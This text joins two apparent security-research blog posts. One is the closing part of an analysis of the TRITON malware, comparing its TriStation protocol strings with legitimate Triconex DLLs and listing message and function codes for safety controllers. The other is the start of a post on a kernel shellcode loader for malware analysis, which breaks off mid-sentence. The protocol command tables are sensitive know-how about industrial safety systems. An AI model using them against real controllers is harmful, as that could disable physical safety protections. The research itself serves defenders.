Minute discrepancies aside, the TriStation structure detailed in Figure 7 is supported by other public analyses. Foremost, researchers from the Coordinated Science Laboratory (CSL) at University of Illinois at Urbana-Champaign published a 2017 paper titled "Attack Induced Common-Mode Failures on PLC-based Safety System in a Nuclear Power Plant". The CSL team mentions that they used the Triconex System Access Application (TSAA) protocol to reverse engineer elements of the TriStation protocol. TSAA is a protocol developed by the same company as TriStation. Unlike TriStation, the TSAA protocol structure is described within official documentation. CSL assessed similarities between the two protocols would exist and they leveraged TSAA to better understand TriStation. The team's overall research and analysis of the general packet structure aligns with our TRITON-sourced packet structure.

There are some awesome blog posts and whitepapers out there that support our findings in one way or another. Writeups by Midnight Blue Labs, Accenture, and US-CERT each explain how the TRITON framework relates to the TriStation protocol in superb detail.

TriStation's Reverse Engineering and TRITON's Development

When TRITON was discovered, we began to wonder how the TRITON actor reverse engineered TriStation and implemented it into the framework. We have a lot of theories, all of which seemed plausible: Did they build, buy, borrow, or steal? Or some combination thereof?

Our initial theory was that the threat actor purchased a Triconex controller and software for their own testing and reverse engineering from the "ground up", although if this was the case we do not believe they had a controller with the exact vulnerable firmware version, else they would have had fewer problems with TRITON in practice at the victim site. They may have bought or used a demo version of the TriStation 1131 software, allowing them to reverse engineer enough of TriStation for the framework. They may have stolen TriStation Python libraries from ICS companies, subsidiaries or system integrators and used the stolen material as a base for TriStation and TRITON development. But then again, it is possible that they borrowed TriStation software, Triconex hardware and Python connectors from government-owned utility that was using them legitimately.

Looking at the raw TRITON code, some of the comments may appear oddly phrased, but we do get a sense that the developer is clearly using many of the right vernacular and acronyms, showing smarts on PLC programming. The TS_cnames.pyc script contains interesting typos such as 'Set lable', 'Alocate network accepted', 'Symbol table ccepted' and 'Set program information reponse'. These appear to be normal human error and reflect neither poor written English nor laziness in coding. The significant amount of annotation, cascading logic, and robust error handling throughout the code suggests thoughtful development and testing of the framework. This complicates the theory of "ground up" development, so did they base their code on something else?

While learning from the TriStation functionality within TRITON, we continued to explore legitimate TriStation software. We began our search for "TS1131.exe" and hit dead ends sorting through TriStation DLLs until we came across a variety of TriStation utilities in MSI form. We ultimately stumbled across a juicy archive containing "Trilog v4." Upon further inspection, this file installed "TriLog.exe," which the original TRITON executable mimicked, and a couple of supporting DLLs, all of which were timestamped around August 2006.

When we saw the DLL file description "Tricon Communications Interface" and original file name "TricCom.DLL", we knew we were in the right place. With a simple look at the file strings, "BAZINGA!" We struck gold.

File Name

tr1com40.dll

MD5

069247DF527A96A0E048732CA57E7D3D

Size

110592

Compile Date

2006-08-23

File Description

Tricon Communications Interface

Product Name

TricCom Dynamic Link Library

File Version

4.2.441

Original File Name

TricCom.DLL

Copyright

Copyright © 1993-2006 Triconex Corporation

The tr1com40.DLL is exactly what you would expect to see in a custom application package. It is a library that helps support the communications for a Triconex controller. If you've pored over TRITON as much as we have, the moment you look at strings you can see the obvious overlaps between the legitimate DLL and TRITON's own TS_cnames.pyc.


Figure 8: Strings excerpt from tr1com40.DLL

Each of the execution command "error codes" from TS_cnames.pyc are in the strings of tr1com40.DLL (Figure 8). We see "An MP has re-educated" and "Invalid Tristation I command". Even misspelled command strings verbatim such as "Non-existant data item" and "Alocate network accepted". We also see many of the same unknown values. What is obvious from this discovery is that some of the strings in TRITON are likely based on code used in communications libraries for Trident and Tricon controllers.

In our brief survey of the legitimate Triconex Corporation binaries, we observed a few samples with related string tables.

Pe:dllname

Compile Date

Reference CPP Strings Code

Lagcom40.dll

2004/11/19

$Workfile:   LAGSTRS.CPP  $ $Modtime:   Jul 21 1999 17:17:26  $ $Revision:   1.0

Tr1com40.dll

2006/08/23

$Workfile:   TR1STRS.CPP  $ $Modtime:   May 16 2006 09:55:20  $ $Revision:   1.4

Tridcom.dll

2008/07/23

$Workfile:   LAGSTRS.CPP  $ $Modtime:   Jul 21 1999 17:17:26  $ $Revision:   1.0

Triccom.dll

2008/07/23

$Workfile:   TR1STRS.CPP  $ $Modtime:   May 16 2006 09:55:20  $ $Revision:   1.4

Tridcom.dll

2010/09/29

$Workfile:   LAGSTRS.CPP  $ $Modtime:   Jul 21 1999 17:17:26  $ $Revision:   1.0 

Tr1com.dll

2011/04/27

$Workfile:   TR1STRS.CPP  $ $Modtime:   May 16 2006 09:55:20  $ $Revision:   1.4

Lagcom.dll

2011/04/27

$Workfile:   LAGSTRS.CPP  $ $Modtime:   Jul 21 1999 17:17:26  $ $Revision:   1.0

Triccom.dll

2011/04/27

$Workfile:   TR1STRS.CPP  $ $Modtime:   May 16 2006 09:55:20  $ $Revision:   1.4

We extracted the CPP string tables in TR1STRS and LAGSTRS and the TS_cnames.pyc TS_names array from TRITON, and compared the 210, 204, and 212 relevant strings from each respective file.

TS_cnames.pyc TS_names and tr1com40.dll share 202 of 220 combined table strings. The remaining strings are unique to each, as seen here:

TS_cnames.TS_names (2017 pyc)

Tr1com40.dll (2006 CPP)

Go to DOWNLOAD mode

<200>

Not set

<209>

Unk75

Bad message from module

Unk76

Bad message type

Unk77

Bad TMI version number

Unk78

Module did not respond

Unk79

Open Connection: Invalid SAP %d

Unk81

Unsupported message for this TMI version

Unk83

 

Wrong command

 

TS_cnames.pyc TS_names and Tridcom.dll (1999 CPP) shared only 151 of 268 combined table strings, showing a much smaller overlap with the seemingly older CPP library. This makes sense based on the context that Tridcom.dll is meant for a Trident controller, not a Tricon controller. It does seem as though Tr1com40.dll and TR1STRS.CPP code was based on older work.

We are not shocked to find that the threat actor reversed legitimate code to bolster development of the TRITON framework. They want to work smarter, not harder, too. But after reverse engineering legitimate software and implementing the basics of the TriStation, the threat actors still had an incomplete understanding of the protocol. In TRITON's TS_cnames.pyc we saw "Unk75", "Unk76", "Unk83" and other values that were not present in the tr1com40.DLL strings, indicating that the TRITON threat actor may have explored the protocol and annotated their findings beyond what they reverse engineered from the DLL. The gaps in TriStation implementation show us why the actors encountered problems interacting with the Triconex controllers when using TRITON in the wild.

You can see more of the Trilog and Triconex DLL files on VirusTotal.

Item Name

MD5

Description

Tr1com40.dll

069247df527a96a0e048732ca57e7d3d

Tricom Communcations DLL

Data1.cab

e6a3c93a6d433cbaf6f573b6c09d76c4

Parent of Tr1com40.dll

Trilog v4.1.360R

13a3b83ba2c4236ca59aba679941c8a5

RAR Archive of TriLog

TridCom.dll

5c2ed617fdec4779cb33c89082a43100

Trident Communications DLL

Afterthoughts

Seeing Triconex systems targeted with malicious intent was new to the world six months ago. Moving forward it would be reasonable to anticipate additional frameworks, such as TRITON, designed for usage against other SIS controllers and associated technologies. If Triconex was within scope, we may see similar attacker methodologies affecting the dominant industrial safety technologies.

Basic security measures do little to thwart truly persistent threat actors and monitoring only IT networks is not an ideal situation. Visibility into both the IT and OT environments is critical for detecting the various stages of an ICS intrusion. Simple detection concepts such as baseline deviation can provide insight into abnormal activity.

While the TRITON framework was actively in use, how many traditional ICS “alarms” were set off while the actors tested their exploits and backdoors on the Triconex controller? How many times did the TriStation protocol, as implemented in their Python scripts, fail or cause errors because of non-standard traffic? How many TriStation UDP pings were sent and how many Connection Requests? How did these statistics compare to the baseline for TriStation traffic? There are no answers to these questions for now. We believe that we can identify these anomalies in the long run if we strive for increased visibility into ICS technologies.

We hope that by holding public discussions about ICS technologies, the Infosec community can cultivate closer relationships with ICS vendors and give the world better insight into how attackers move from the IT to the OT space. We want to foster more conversations like this and generally share good techniques for finding evil. Since most of all ICS attacks involve standard IT intrusions, we should probably come together to invent and improve any guidelines for how to monitor PCs and engineering workstations that bridge the IT and OT networks. We envision a world where attacking or disrupting ICS operations costs the threat actor their cover, their toolkits, their time, and their freedom. It's an ideal world, but something nice to shoot for.

Thanks and Future Work

There is still much to do for TRITON and TriStation. There are many more sub-message types and nuances for parsing out the nitty gritty details, which is hard to do without a controller of our own. And although we’ve published much of what we learned about the TriStation here on the blog, our work will continue as we continue our study of the protocol.

Thanks to everyone who did so much public research on TRITON and TriStation. We have cited a few individuals in this blog post, but there is a lot more community-sourced information that gave us clues and leads for our research and testing of the framework and protocol. We also have to acknowledge the research performed by the TRITON attackers. We borrowed a lot of your knowledge about TriStation from the TRITON framework itself.

Finally, remember that we're here to collaborate. We think most of our research is right, but if you notice any errors or omissions, or have ideas for improvements, please spear phish contact: smiller@fireeye.com.

Recommended Reading

Appendix A: TriStation Message Type Codes

The following table consists of hex values at offset 0 in the TriStation UDP packets and the associated dictionary definitions, extracted verbatim from the TRITON framework in library TS_cnames.pyc.

Value at 0x0

Message Type

1

Connection Request

2

Connection Response

3

Disconnect Request

4

Disconnect Response

5

Execution Command

6

Ping Command

7

Connection Limit Reached

8

Not Connected

9

MPS Are Dead

10

Access Denied

11

Connection Failed

Appendix B: TriStation Execution Command Function Codes

The following table consists of hex values at offset 6 in the TriStation UDP packets and the associated dictionary definitions, extracted verbatim from the TRITON framework in library TS_cnames.pyc.

Value at 0x6

TS_cnames String

0

0: 'Start download all',

1

1: 'Start download change',

2

2: 'Update configuration',

3

3: 'Upload configuration',

4

4: 'Set I/O addresses',

5

5: 'Allocate network',

6

6: 'Load vector table',

7

7: 'Set calendar',

8

8: 'Get calendar',

9

9: 'Set scan time',

A

10: 'End download all',

B

11: 'End download change',

C

12: 'Cancel download change',

D

13: 'Attach TRICON',

E

14: 'Set I/O address limits',

F

15: 'Configure module',

10

16: 'Set multiple point values',

11

17: 'Enable all points',

12

18: 'Upload vector table',

13

19: 'Get CP status ',

14

20: 'Run program',

15

21: 'Halt program',

16

22: 'Pause program',

17

23: 'Do single scan',

18

24: 'Get chassis status',

19

25: 'Get minimum scan time',

1A

26: 'Set node number',

1B

27: 'Set I/O point values',

1C

28: 'Get I/O point values',

1D

29: 'Get MP status',

1E

30: 'Set retentive values',

1F

31: 'Adjust clock calendar',

20

32: 'Clear module alarms',

21

33: 'Get event log',

22

34: 'Set SOE block',

23

35: 'Record event log',

24

36: 'Get SOE data',

25

37: 'Enable OVD',

26

38: 'Disable OVD',

27

39: 'Enable all OVDs',

28

40: 'Disable all OVDs',

29

41: 'Process MODBUS',

2A

42: 'Upload network',

2B

43: 'Set lable',

2C

44: 'Configure system variables',

2D

45: 'Deconfigure module',

2E

46: 'Get system variables',

2F

47: 'Get module types',

30

48: 'Begin conversion table download',

31

49: 'Continue conversion table download',

32

50: 'End conversion table download',

33

51: 'Get conversion table',

34

52: 'Set ICM status',

35

53: 'Broadcast SOE data available',

36

54: 'Get module versions',

37

55: 'Allocate program',

38

56: 'Allocate function',

39

57: 'Clear retentives',

3A

58: 'Set initial values',

3B

59: 'Start TS2 program download',

3C

60: 'Set TS2 data area',

3D

61: 'Get TS2 data',

3E

62: 'Set TS2 data',

3F

63: 'Set program information',

40

64: 'Get program information',

41

65: 'Upload program',

42

66: 'Upload function',

43

67: 'Get point groups',

44

68: 'Allocate symbol table',

45

69: 'Get I/O address',

46

70: 'Resend I/O address',

47

71: 'Get program timing',

48

72: 'Allocate multiple functions',

49

73: 'Get node number',

4A

74: 'Get symbol table',

4B

75: 'Unk75',

4C

76: 'Unk76',

4D

77: 'Unk77',

4E

78: 'Unk78',

4F

79: 'Unk79',

50

80: 'Go to DOWNLOAD mode',

51

81: 'Unk81',

52

 

53

83: 'Unk83',

54

 

55

 

56

 

57

 

58

 

59

 

5A

 

5B

 

5C

 

5D

 

5E

 

5F

 

60

 

61

 

62

 

63

 

64

100: 'Command rejected',

65

101: 'Download all permitted',

66

102: 'Download change permitted',

67

103: 'Modification accepted',

68

104: 'Download cancelled',

69

105: 'Program accepted',

6A

106: 'TRICON attached',

6B

107: 'I/O addresses set',

6C

108: 'Get CP status response',

6D

109: 'Program is running',

6E

110: 'Program is halted',

6F

111: 'Program is paused',

70

112: 'End of single scan',

71

113: 'Get chassis configuration response',

72

114: 'Scan period modified',

73

115: '<115>',

74

116: '<116>',

75

117: 'Module configured',

76

118: '<118>',

77

119: 'Get chassis status response',

78

120: 'Vectors response',

79

121: 'Get I/O point values response',

7A

122: 'Calendar changed',

7B

123: 'Configuration updated',

7C

124: 'Get minimum scan time response',

7D

125: '<125>',

7E

126: 'Node number set',

7F

127: 'Get MP status response',

80

128: 'Retentive values set',

81

129: 'SOE block set',

82

130: 'Module alarms cleared',

83

131: 'Get event log response',

84

132: 'Symbol table ccepted',

85

133: 'OVD enable accepted',

86

134: 'OVD disable accepted',

87

135: 'Record event log response',

88

136: 'Upload network response',

89

137: 'Get SOE data response',

8A

138: 'Alocate network accepted',

8B

139: 'Load vector table accepted',

8C

140: 'Get calendar response',

8D

141: 'Label set',

8E

142: 'Get module types response',

8F

143: 'System variables configured',

90

144: 'Module deconfigured',

91

145: '<145>',

92

146: '<146>',

93

147: 'Get conversion table response',

94

148: 'ICM print data sent',

95

149: 'Set ICM status response',

96

150: 'Get system variables response',

97

151: 'Get module versions response',

98

152: 'Process MODBUS response',

99

153: 'Allocate program response',

9A

154: 'Allocate function response',

9B

155: 'Clear retentives response',

9C

156: 'Set initial values response',

9D

157: 'Set TS2 data area response',

9E

158: 'Get TS2 data response',

9F

159: 'Set TS2 data response',

A0

160: 'Set program information reponse',

A1

161: 'Get program information response',

A2

162: 'Upload program response',

A3

163: 'Upload function response',

A4

164: 'Get point groups response',

A5

165: 'Allocate symbol table response',

A6

166: 'Program timing response',

A7

167: 'Disable points full',

A8

168: 'Allocate multiple functions response',

A9

169: 'Get node number response',

AA

170: 'Symbol table response',

AB

 

AC

 

AD

 

AE

 

AF

 

B0

 

B1

 

B2

 

B3

 

B4

 

B5

 

B6

 

B7

 

B8

 

B9

 

BA

 

BB

 

BC

 

BD

 

BE

 

BF

 

C0

 

C1

 

C2

 

C3

 

C4

 

C5

 

C6

 

C7

 

C8

200: 'Wrong command',

C9

201: 'Load is in progress',

CA

202: 'Bad clock calendar data',

CB

203: 'Control program not halted',

CC

204: 'Control program checksum error',

CD

205: 'No memory available',

CE

206: 'Control program not valid',

CF

207: 'Not loading a control program',

D0

208: 'Network is out of range',

D1

209: 'Not enough arguments',

D2

210: 'A Network is missing',

D3

211: 'The download time mismatches',

D4

212: 'Key setting prohibits this operation',

D5

213: 'Bad control program version',

D6

214: 'Command not in correct sequence',

D7

215: '<215>',

D8

216: 'Bad Index for a module',

D9

217: 'Module address is invalid',

DA

218: '<218>',

DB

219: '<219>',

DC

220: 'Bad offset for an I/O point',

DD

221: 'Invalid point type',

DE

222: 'Invalid Point Location',

DF

223: 'Program name is invalid',

E0

224: '<224>',

E1

225: '<225>',

E2

226: '<226>',

E3

227: 'Invalid module type',

E4

228: '<228>',

E5

229: 'Invalid table type',

E6

230: '<230>',

E7

231: 'Invalid network continuation',

E8

232: 'Invalid scan time',

E9

233: 'Load is busy',

EA

234: 'An MP has re-educated',

EB

235: 'Invalid chassis or slot',

EC

236: 'Invalid SOE number',

ED

237: 'Invalid SOE type',

EE

238: 'Invalid SOE state',

EF

239: 'The variable is write protected',

F0

240: 'Node number mismatch',

F1

241: 'Command not allowed',

F2

242: 'Invalid sequence number',

F3

243: 'Time change on non-master TRICON',

F4

244: 'No free Tristation ports',

F5

245: 'Invalid Tristation I command',

F6

246: 'Invalid TriStation 1131 command',

F7

247: 'Only one chassis allowed',

F8

248: 'Bad variable address',

F9

249: 'Response overflow',

FA

250: 'Invalid bus',

FB

251: 'Disable is not allowed',

FC

252: 'Invalid length',

FD

253: 'Point cannot be disabled',

FE

254: 'Too many retentive variables',

FF

255: 'LOADER_CONNECT',

 

256: 'Unknown reject code'

Loading Kernel Shellcode

In the wake of recent hacking tool dumps, the FLARE team saw a spike in malware samples detonating kernel shellcode. Although most samples can be analyzed statically, the FLARE team sometimes debugs these samples to confirm specific functionality. Debugging can be an efficient way to get around packing or obfuscation and quickly identify the structures, system routines, and processes that a kernel shellcode sample is accessing.

This post begins a series centered on kernel software analysis, and introduces a tool that uses a custom Windows kernel driver to load and execute Windows kernel shellcode. I’ll walk through a brief case study of some kernel shellcode, how to load shellcode with FLARE’s kernel shellcode loader, how to build your own copy, and how it works.

As always, only analyze malware in a safe environment such as a VM; never use tools such as a kernel shellcode loader on any system that you rely on to get your work done.

A Tale of Square Pegs and Round Holes

Depending upon how a shellcode sample is encountered, the analyst may not know whether it is meant to target user space or kernel space. A common triage step is to load the sample in a shellcode loader and debug it in user space. With kernel shellcode, this can have unexpected results such as the access violation in Figure 1.


Figure 1: Access violation from shellcode dereferencing null pointer

The kernel environment is a world apart from user mode: various registers take on different meanings and point to totally different structures. For instance, while the gs segment register in 64-bit Windows user mode points to the Thread Information Block (TIB) whose size is only 0x38 bytes, in kernel mode it points to the Processor Control Region (KPCR) which is much larger. In Figure 1 at address 0x2e07d9, the shellcode is attempting to access the IdtBase member of the KPCR, but because it is running in user mode, the value at offset 0x38 from the gs segment is null. This causes the next instruction to attempt to access invalid memory in the NULL page. What the code is trying to do doesn’t make sense in the user mode environment, and it has crashed as a result.

In contrast, kernel mode is a perfect fit. Figure 2 shows WinDbg’s dt command being used to display the _KPCR type defined within ntoskrnl.pdb, highlighting the field at offset 0x38 named IdtBase.


Figure 2: KPCR structure

Given the rest of the code in this sample, accessing the IdtBase field of the KPCR made perfect sense. Determining that this was kernel shellcode allowed me to quickly resolve the rest of my questions, but to confirm my findings, I wrote a kernel shellcode loader. Here’s what it looks like to use this tool to load a small, do-nothing piece of shellcode.

Using FLARE’s Kernel Shellcode Loader

I booted a target system with a kernel debugger and opened an administrative command prompt in the directory where I copied the shellcode loader (kscldr.exe). The shellcode loader expects to receive the name of the file on disk where the shellcode is located as its only argument. Figure 3 shows an example where I’ve used a hex editor to write the opcodes for the NOP (0x90) and RET (0xC3) instructions into a binary file and invoked kscldr.exe to pass that code to the kernel shellcode loader driver. I created my file using the Windows port of xxd that comes with Vim for Windows.


Figure 3: Using kscldr.exe to load kernel shellcode

The shellcode loader prompts with a security warning. After clicking yes, kscldr.exe installs its driver and uses it to execute the shellcode. The system is frozen at this point because the kernel driver has already issued its breakpoint and the kernel debugger is awaiting commands. Figure 4 shows WinDbg hitting the breakpoint and displaying the corresponding source code for kscldr.sys.


Figure 4: Breaking in kscldr.sys

From the breakpoint, I use WinDbg with source-level debugging to step and trace into the shellcode buffer. Figure 5 shows WinDbg’s disassembly of the buffer after doing this.


Figure 5: Tracing into and disassembling the shellcode

The disassembly shows the 0x90 and 0xc3 opcodes from before, demonstrating that the shellcode buffer is indeed being executed. From here, the powerful facilities of WinDbg are available to debug and analyze the code’s behavior.

Building It Yourself

To try out FLARE’s kernel shellcode loader for yourself, you’ll need to download the source code.

To get started building it, download and install the Windows Driver Kit (WDK). I’m using Windows Driver Kit Version 7.1.0, which is command line driven, whereas more modern versions of the WDK integrate with Visual Studio. If you feel comfortable using a newer kit, you’re welcomed to do so, but beware, you’ll have to take matters into your own hands regarding build commands and dependencies. Since WDK 7.1.0 is adequate for purposes of this tool, that is the version I will describe in this post.

Once you have downloaded and installed the WDK, browse to the Windows Driver Kits directory in the start menu on your development system and select the appropriate environment. Figure 6 shows the WDK program group on a Windows 7 system. The term “checked build” indicates that debugging checks will be included. I plan to load 64-bit kernel shellcode, and I like having Windows catch my mistakes early, so I’m using the x64 Checked Build Environment.


Figure 6: Windows Driver Kits program group

In the WDK command prompt, change to the directory where you downloaded the FLARE kernel shellcode loader and type ez.cmd. The script will cause prompts to appear asking you to supply and use a password for a test signing certificate. Once the build completes, visit the bin directory and copy kscldr.exe to your debug target. Before you can commence using your custom copy of this tool, you’ll need to follow just a few more steps to prepare the target system to allow it.

Preparing the Debug Target

To debug kernel shellcode, I wrote a Windows software-only driver that loads and runs shellcode at privilege level 0. Normally, Windows only loads drivers that are signed with a special cross-certificate, but Windows allows you to enable testsigning to load drivers signed with a test certificate. We can create this test certificate for free, and it won’t allow the driver to be loaded on production systems, which is ideal.

In addition to enabling testsigning mode, it is necessary to enable kernel debugging to be able to really follow what is happening after the kernel shellcode gains execution. Starting with Windows Vista, we can enable both testsigning and kernel debugging by issuing the following two commands in an administrative command prompt followed by a reboot:

bcdedit.exe /set testsigning on

bcdedit.exe /set debug on

For debugging in a VM, I install VirtualKD, but you can also follow your virtualization vendor’s directions for connecting a serial port to a named pipe or other mechanism that WinDbg understands. Once that is set up and tested, we’re ready to go!

If you try the shellcode loader and get a blue screen indicating stop code 0x3B (SYSTEM_SERVICE_EXCEPTION), then you likely did not successfully connect the kernel debugger beforehand. Remember that the driver issues a software interrupt to give control to the debugger immediately before executing the shellcode; if the debugger is not successfully attached, Windows will blue screen. If this was the case, reboot and try again, this time first confirming that the debugger is in control by clicking Debug -> Break in WinDbg. Once you know you have control, you can issue the g command to let execution continue (you may need to disable driver load notifications to get it to finish the boot process without further intervention: sxd ld).

How It Works

The user-space application (kscldr.exe) copies the driver from a PE-COFF resource to the disk and registers it as a Windows kernel service. The driver implements device write and I/O control routines to allow interaction from the user application. Its driver entry point first registers dispatch routines to handle CreateFile, WriteFile, DeviceIoControl, and CloseHandle. It then creates a device named \Device\kscldr and a symbolic link making the device name accessible from user-s